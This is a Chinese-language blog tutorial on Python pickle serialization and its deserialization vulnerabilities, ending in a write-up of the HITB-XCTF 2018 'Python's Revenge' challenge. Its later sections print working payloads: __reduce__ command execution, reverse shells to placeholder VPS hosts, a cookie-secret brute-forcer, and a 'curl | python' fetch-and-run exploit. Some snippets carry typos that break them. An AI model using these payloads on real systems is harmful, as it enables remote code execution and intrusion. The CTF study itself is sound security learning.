Python 序列化漏洞学习(上)

0x00前言

python序列化分为JSON、pickle、cPickle,JSON只能处理基本数据类型。JSON用于各种语言之间的字符转换。pickle用于Python程序对象的持久化或者Python程序间对象网络传输,但不同版本的Python序列化可能还有差异。,当你需要将重要数据或session保存并且加密的、重用或者发送给他人的时候使用。json只能将数据进行储存。cPickle与pickle是相同的作用,但是由于cPickle是用C编码的,所以运行效率上比pickle要快。

0x01load 与dump

pickle与cPickle的主要模块为load()dump()。dump()函数接受一个数据对象和一个文件句柄作为参数,把数据对象以特定的格式保存到给定的文件中。使用load()函数从文件或者经过序列化的内容中取出已保存的对象时,如果保存为一个函数式结构体,则可以经过pickle恢复这些对象到他们原本的格式

pickle.dump(obj, file, protocol=None, *, fix_imports=True)

将需要序列化的字符串或者整个对象结构传入obj参数中,参数protocol是序列化模式,python2.x中默认值为0,python3.x中默认值为3,表示以文本的形式序列化,protocol的值还可以是1或2,表示以二进制的形式序列化。

pickle.dumps(obj, protocol=None, *, fix_imports=True)

将对象或者数据结构赋值给obj参数,返回的参数为bytes对象,其余的与dump一致

注:当你想将在python3.x的序列化在python2.x中加载需要保证protocol参数不超过3

__author__ = 'christa'
import pickle
import time
try:
    import cPickle   # python 2.x
except:
    import _pickle as cPickle # python 3.x

dics ={'time':time.time(),"oth":([10,"christa"],None,False,True),}
x_dic = pickle.dumps(dics)
# python2.x
'''
(dp0
S'oth'
p1
((lp2
I10
aS'christa'
p3
aNI00
I01
tp4
sS'time'
p5
F1549439001.75345
s.
'''
# python3.x 
'''
b'\x80\x03}q\x00(X\x04\x00\x00\x00timeq\x01GA\xd7\x16\xa4#\xa3\xadAX\x03\x00\x00\x00othq\x02(]q\x03(K\nX\x07\x00\x00\x00christaq\x04eN\x89\x88tq\x05u.'
'''

x_dic2 = cPickle.dumps(dics)
# python 2.x
'''
(dp1
S'oth'
p2
((lp3
I10
aS'christa'
p4
aNI00
I01
tp5
sS'time'
p6
F1549439001.7534499
s.
'''
#python 3.x
'''
b'\x80\x03}q\x00(X\x04\x00\x00\x00timeq\x01GA\xd7\x16\xa4#\xa3\xadAX\x03\x00\x00\x00othq\x02(]q\x03(K\nX\x07\x00\x00\x00christaq\x04eN\x89\x88tq\x05u.'
'''
class test():
    def __init__(self):
        pass
    def __str__(self):
        return 'pcikle test'
    def show(self):
        print('pickle test show')
x=test()
with open('./pocs.pickles','wb') as f:
    cPickle.dump(x, f)
'''
(i__main__
test
p1
(dp2
b.
'''
    #pickle.dump(x, f)
'''
(i__main__
test
p0
(dp1
b.
'''
f.close()

pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict")

从文件中加载经过序列化的bytes函数,pickle的协议版本是自动检测的,因此不需要协议参数。经过pickle对象的表示的字节将被忽略。可选关键字参数是fix_imports、encoding和errors,它们用于控制Python 2生成的pickle流的兼容性支持。如果fix_imports为真,pickle将尝试将旧的python2名称映射到python3中使用的新名称。编码和错误告诉pickle如何解码Python 2 pickle的8位字符串实例;它们分别默认为“ASCII”和“strict”。编码可以是“字节”,以便将这些8位字符串实例读取为字节对象。unpickle由Python 2 pickle的NumPy数组和datetime、date和time实例需要使用encoding='latin1',也等效于pickle.Unpickler(file).load

pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict")

加载的对象为通过pickle.dumps加载后的bytes参数,具体使用同load()函数一致。

__author__ = 'christa'
import pickle
import time
try:
    import cPickle   # python2
except:
    import _pickle as cPickle # python3

dics ={'time':time.time(),"oth":([10,"christa"],None,False,True),}
x_dic = pickle.dumps(dics)
x_dic2 = cPickle.dumps(dics)
print(x_dic)
#print(x_dic2)
class test():
    def __init__(self):
        pass
    def __str__(self):
        return 'pcikle test'
    def show(self):
        print('pickle test show')
x=test()
with open('./pocs.pickles','wb') as f:
   # cPickle.dump(x, f)
    pickle.dump(x, f, protocol = 2)
f.close()

print(pickle.loads(x_dic))
# {'time': 1549442668.8566263, 'oth': ([10, 'christa'], None, False, True)}
print(cPickle.loads(x_dic2))
# {'time': 1549442668.8566263, 'oth': ([10, 'christa'], None, False, True)}
#m = pickle.load(open('./pocs.pickles','rb'))
m = pickle.Unpickler(open('./pocs.pickles','rb'))
m = m.load()
m.show()
# pickle test show
print(m)
# pcikle test

 

cPickle/pickle漏洞

pickle因为可以加载任何类的参数化,因此也可以加载任何非正规的函数,同时官网也提醒我们不能完全相信任何用户和任何非授权的用户。pickle允许任意对象去定义一个__reduce__方法来申明怎么序列化这个对象。这个方法返回一个字符串或者元组来描述当反序列化的时候该如何重构

利用pickle执行文件命令执行

# encoding: utf-8
__author__ = 'christa'
from datetime import date
import pickle
import os
class test(object):
    def __reduce__(self):
        return (os.system,('ifconfig',))

a=test()
with open('poc.pickle','wb') as f:
    pickle.dump(a,f)
f.close()
pickle.load(open('./poc.pickle'))

函数运行的结果为

pi@raspberrypi:~ $ python pick.py
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:df:32:28:38  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.106  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::b275:6ade:65f0:c5e0  prefixlen 64  scopeid 0x20<link>
        ether b8:27:eb:ac:10:66  txqueuelen 1000  (Ethernet)
        RX packets 396518  bytes 507059177 (483.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 255227  bytes 21325313 (20.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2458  bytes 137570 (134.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2458  bytes 137570 (134.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

同时可以写文件

#codeing :utf-8
__author__ = 'christa'
import os

try:
    import cPickle
except:
    import _pickle as cPickle
class genpoc(object):
    def __reduce__(self):
        s = """echo christa>poc.txt"""
        return os.system, (s,)

e = genpoc()
poc = cPickle.dumps(e)
with open('poc.pickles','wb') as f:
    cPickle.dump(e,f)
f.close()
cPickle.load(open('./poc.pickles'))

运行后产生文件

pi@raspberrypi:~ $ cat poc.txt
christa

利用pickle进行命令执行(RCE)

import pickle
try:
    import cPickle
except:
    import _pickle as cPickle
payload='''c__builtin__\nsetattr\n(c__builtin__\n__import__\n(S'sys'\ntRS'stdin'\ncStringIO\nStringIO\n(S'__import__('os').system('bash -c "bash -i >& /dev/tcp/your vps/port 0<&1 2>&1"')'\ntRtRc__builtin__\ninput\n(S'python> '\ntR.'''
cPickle.loads(payload)

攻击机得到回显

 

HITB-XCTF 2018 — Python’s Revenge

 通过这道web题目的源码

# Python's revenge
# This is a easy python sandbox, can you bypass it and get the flag?
# https://hitbxctf2018.xctf.org.cn/contest_challenge/
from __future__ import unicode_literals
from flask import Flask, request, make_response, redirect, url_for, session
from flask import render_template, flash, redirect, url_for, request
from werkzeug.security import safe_str_cmp
from base64 import b64decode as b64d
from base64 import b64encode as b64e
from hashlib import sha256
from cStringIO import StringIO
import random
import string

import os
import sys
import subprocess
import commands
import pickle
import cPickle
import marshal
import os.path
import filecmp
import glob
import linecache
import shutil
import dircache
import io
import timeit
import popen2
import code
import codeop
import pty
import posixfile

SECRET_KEY = 'you will never guess'

if not os.path.exists('.secret'):
    with open(".secret", "w") as f:
        secret = ''.join(random.choice(string.ascii_letters + string.digits)
                         for x in range(4))
        f.write(secret)
with open(".secret", "r") as f:
    cookie_secret = f.read().strip()

app = Flask(__name__)
app.config.from_object(__name__)

black_type_list = [eval, execfile, compile, open, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.open, posixfile.fileopen]


@app.before_request
def count():
    session['cnt'] = 0


@app.route('/')
def home():
    remembered_str = 'Hello, here\'s what we remember for you. And you can change, delete or extend it.'
    new_str = 'Hello fellow zombie, have you found a tasty brain and want to remember where? Go right here and enter it:'
    location = getlocation()
    if location == False:
        return redirect(url_for("clear"))
    return render_template('index.html', txt=remembered_str, location=location)


@app.route('/clear')
def clear():
    flash("Reminder cleared!")
    response = redirect(url_for('home'))
    response.set_cookie('location', max_age=0)
    return response


@app.route('/reminder', methods=['POST', 'GET'])
def reminder():
    if request.method == 'POST':
        location = request.form["reminder"]
        if location == '':
            flash("Message cleared, tell us when you have found more brains.")
        else:
            flash("We will remember where you find your brains.")
        location = b64e(pickle.dumps(location))
        cookie = make_cookie(location, cookie_secret)
        response = redirect(url_for('home'))
        response.set_cookie('location', cookie)
        return response
    location = getlocation()
    if location == False:
        return redirect(url_for("clear"))
    return render_template('reminder.html')


class FilterException(Exception):
    def __init__(self, value):
        super(FilterException, self).__init__(
            'The callable object {value} is not allowed'.format(value=str(value)))


class TimesException(Exception):
    def __init__(self):
        super(TimesException, self).__init__(
            'Call func too many times!')


def _hook_call(func):
    def wrapper(*args, **kwargs):
        session['cnt'] += 1
        print session['cnt']
        print args[0].stack
        for i in args[0].stack:
            if i in black_type_list:
                raise FilterException(args[0].stack[-2])
            if session['cnt'] > 4:
                raise TimesException()
        return func(*args, **kwargs)
    return wrapper


def loads(strs):
    reload(pickle)
    files = StringIO(strs)
    unpkler = pickle.Unpickler(files)
    unpkler.dispatch[pickle.REDUCE] = _hook_call(
        unpkler.dispatch[pickle.REDUCE])
    return unpkler.load()


def getlocation():
    cookie = request.cookies.get('location')
    if not cookie:
        return ''
    (digest, location) = cookie.split("!")
    if not safe_str_cmp(calc_digest(location, cookie_secret), digest):
        flash("Hey! This is not a valid cookie! Leave me alone.")
        return False
    location = loads(b64d(location))
    return location


def make_cookie(location, secret):
    return "%s!%s" % (calc_digest(location, secret), location)


def calc_digest(location, secret):
    return sha256("%s%s" % (location, secret)).hexdigest()


if __name__ == '__main__':
app.run(host="0.0.0.0", port=5051)

通过阅读源码,首先看到SECRET_KEY  

 

SECRET_KEY = 'you will never guess'

 

首先从loads(str)函数中看到了pickle序列化的模块,初步推测可能是序列化漏洞

def loads(strs):
    reload(pickle)
    files = StringIO(strs)
    unpkler = pickle.Unpickler(files)
    unpkler.dispatch[pickle.REDUCE] = _hook_call(
        unpkler.dispatch[pickle.REDUCE])
    return unpkler.load()

只要我们能通过Unpickler函数由类中的obh.__reduce__()函数反序列化就可以执行RCE,可以尝试从cookie中的getlocation()函数中来检查是否有可执行的漏洞

def getlocation():
    cookie = request.cookies.get('location')
    if not cookie:
        return ''
    (digest, location) = cookie.split("!")
    if not safe_str_cmp(calc_digest(location, cookie_secret), digest):
        flash("Hey! This is not a valid cookie! Leave me alone.")
        return False
    location = loads(b64d(location))
    return location

同时找到location的位置,由空域名中得到:

@app.route('/')
def home():
    remembered_str = 'Hello, here\'s what we remember for you. And you can change, delete or extend it.'
    new_str = 'Hello fellow zombie, have you found a tasty brain and want to remember where? Go right here and enter it:'
    location = getlocation()
    if location == False:
        return redirect(url_for("clear"))
    return render_template('index.html', txt=remembered_str, location=location)

由后置域名/reminder中得到

@app.route('/reminder', methods=['POST', 'GET'])
def reminder():
    if request.method == 'POST':
        location = request.form["reminder"]
        if location == '':
            flash("Message cleared, tell us when you have found more brains.")
        else:
            flash("We will remember where you find your brains.")
        location = b64e(pickle.dumps(location))
        cookie = make_cookie(location, cookie_secret)
        response = redirect(url_for('home'))
        response.set_cookie('location', cookie)
        return response
    location = getlocation()
    if location == False:
        return redirect(url_for("clear"))
    return render_template('reminder.html')

但是从getlocation()函数中有一个safe_str_cmp()函数,将传入的两个参数进行比较,只有完全相等的字符串才能保证安全性

def safe_str_cmp(a, b):
    """This function compares strings in somewhat constant time.  This
    requires that the length of at least one string is known in advance.

    Returns `True` if the two strings are equal, or `False` if they are not.

    .. versionadded:: 0.7
    """
    if isinstance(a, text_type):
        a = a.encode('utf-8')
    if isinstance(b, text_type):
        b = b.encode('utf-8')

    if _builtin_safe_str_cmp is not None:
        return _builtin_safe_str_cmp(a, b)

    if len(a) != len(b):
        return False

    rv = 0
    if PY2:
        for x, y in izip(a, b):
            rv |= ord(x) ^ ord(y)
    else:
        for x, y in izip(a, b):
            rv |= x ^ y

    return rv == 0

此函数将cookie值修改为另一个没有密匙的密码数据,即cookie密匙,cookie密匙是随机生成并且加载到一个后缀名为.sercert的文件的第一行当中。

if not os.path.exists('.secret'):
    with open(".secret", "w") as f:
        secret = ''.join(random.choice(string.ascii_letters + string.digits)
                         for x in range(4))
        f.write(secret)
with open(".secret", "r") as f:
    cookie_secret = f.read().strip()

我们发现cookie只用了4个字节[0-9][a-z][A-Z]中随机抽取四个字符来创建cookie,同时考虑是否可以提取出提醒消息来让服务器返回一个已签名的cookie。

通过脚本强行爆破(借用wirteup上的脚本),因为环境已经关闭,cookie_secret已经无法复原

# _*_ coding: utf-8 _*_
import string
from hashlib import sha256
import sys

def calc_digest(location, secret):
   return sha256("%s%s" % (location, secret)).hexdigest()

#location='VmNocmlzdGEKcDAKLg==' # christa 将flask中解密后的location打印出来
#target='259ed4fa4f21fe8424db0199ba3db798b2988d03b9356cf140561ea4682b5af9'  # 提取cookie中!之前的值
location='VmdnZXoKcDAKLg==' # ggez
target='e5d37df17dce2982bd5a3ad658803ca2bad7922f09e43a14f93e9604eaef90ce'
lts=string.ascii_letters + string.digits

for x in lts:
   for y in lts:
      for z in lts:
         for a in lts:
            secret=x+y+z+a
            if calc_digest(location, secret) == target:
                print secret
                sys.exit(0)

通过脚本跑出来cookie_secret为

hitb

只需要构造pickle即可,但同时flask中列出了黑名单

black_type_list = [eval, execfile, compile, open, file, os.system, os.popen,
 os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod,
 os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir,
 os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat,
 os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove,
 os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam,
 os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve,
 os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill,
 os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve,
 os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load,
 cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output,
 subprocess.Popen, commands.getstatusoutput, commands.getoutput,
 commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, 
 shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, 
 dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, 
 popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, 
 code.compile_command, codeop.compile_command, pty.spawn, posixfile.open,
 posixfile.fileopen]

def _hook_call(func):
    def wrapper(*args, **kwargs):
        session['cnt'] += 1
        print session['cnt']
        print args[0].stack
        for i in args[0].stack:
            if i in black_type_list:
                raise FilterException(args[0].stack[-2])
            if session['cnt'] > 4:
                raise TimesException()
        return func(*args, **kwargs)
    return wrapper

同时发现有SSTI漏洞,具体可以看上一篇博客基于flask SSTI沙箱逃逸研究 通过payload

class SSTI_EXP(object):
   def __reduce __(self):
   return(render_template_string,("{{''.__ class __.mro()[2] .__ subclasses __()}} ",))

执行序列化将可以用的子类打印在html上面发现了subprocess.popen通过有效载荷

import pickle
from flask import render_template
from base64 import b64encode
from hashlib import sha256
import requests

class Exploit(object):
   def __reduce__(self):
   return (render_template_string, ("{{ ''.__class__.mro()[2].__subclasses__()[312]('curl my-server-ip | python  ',shell=True).communicate() }}", ))

payload = b64encode(pickle.dumps(Exploit()))
cookie_secret = "hitb"
mac = sha256(shellcode + cookie_secret).hexdigest()
exploit = mac + "!" +  payload
requests.get("http://47.75.151.118:9999/", cookies={"location": exploit})

或者飘零师傅的payload

import pickle
import platform
from base64 import b64encode as b64e
import string
from hashlib import sha256

def make_cookie(location, secret):
    return "%s!%s" % (calc_digest(location, secret), location)

def calc_digest(location, secret):
    return sha256("%s%s" % (location, secret)).hexdigest()
class Exploit(object):
    def __reduce__(self):
 		return (platform.popen,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"你的vps\",23333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",)) 
def serialize_exploit():
    shellcode = pickle.dumps(Exploit())
    return shellcode

location = b64e(serialize_exploit())
cookie_secret = "hitb"
cookie = make_cookie(location, cookie_secret)
print cookie

将其反序列化并执行RCE,最终flag在环境中的根目录下,cat即可。

至此,通过HITB-XCTF 2018 — Python’s Revenge 来巩固python的序列化漏洞,同时也在钻研p神的picklecode Python反序列化沙盒绕过 虽然环境已近关闭,但是测试环境已经公布出来啦,在https://github.com/phith0n/code-breaking 中,争取拿下这个题目!关于python3的序列化的问题后期再慢慢研究吧,好希望有大佬指导呀…

 

Reference

  1. https://xz.aliyun.com/t/2289
  2. https://zhuanlan.zhihu.com/p/25981037
  3. https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html
  4. http://bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/
  5. https://www.cnblogs.com/nju2014/p/5383992.html
  6. https://medium.com/@u0x/hitb-xctf-2018-pythons-revenge-web-writeup-7ec4d25872d5
  7. https://skysec.top/2018/04/13/2018-XCTF-HITB-WEB/